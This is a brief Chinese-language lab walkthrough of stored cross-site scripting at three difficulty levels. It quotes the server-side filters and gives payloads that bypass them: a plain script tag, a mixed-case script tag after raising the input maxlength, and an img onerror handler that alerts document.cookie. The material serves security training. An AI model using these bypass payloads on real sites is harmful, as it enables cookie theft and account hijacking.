low
無驗證,Massage直接注入
<script>alert(document.cookie)</script>medium
查看源碼發現Name只過濾了<scrpit>標籤
$name = str_replace( '<script>', '', $name ); 繞過思路:HTML頁面修改Name的最大輸入長度,注入Name,注入script大寫
<input name="txtName" type="text" size="30" maxlength="100"><Script>alert(document.cookie)</script>high
查看源碼,可發現Name只用正則過濾了
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );繞過思路:HTML頁面修改Name的最大輸入長度,注入Name,注入換一種標籤,這裏用img
<img src=1 onerror=alert(document.cookie)>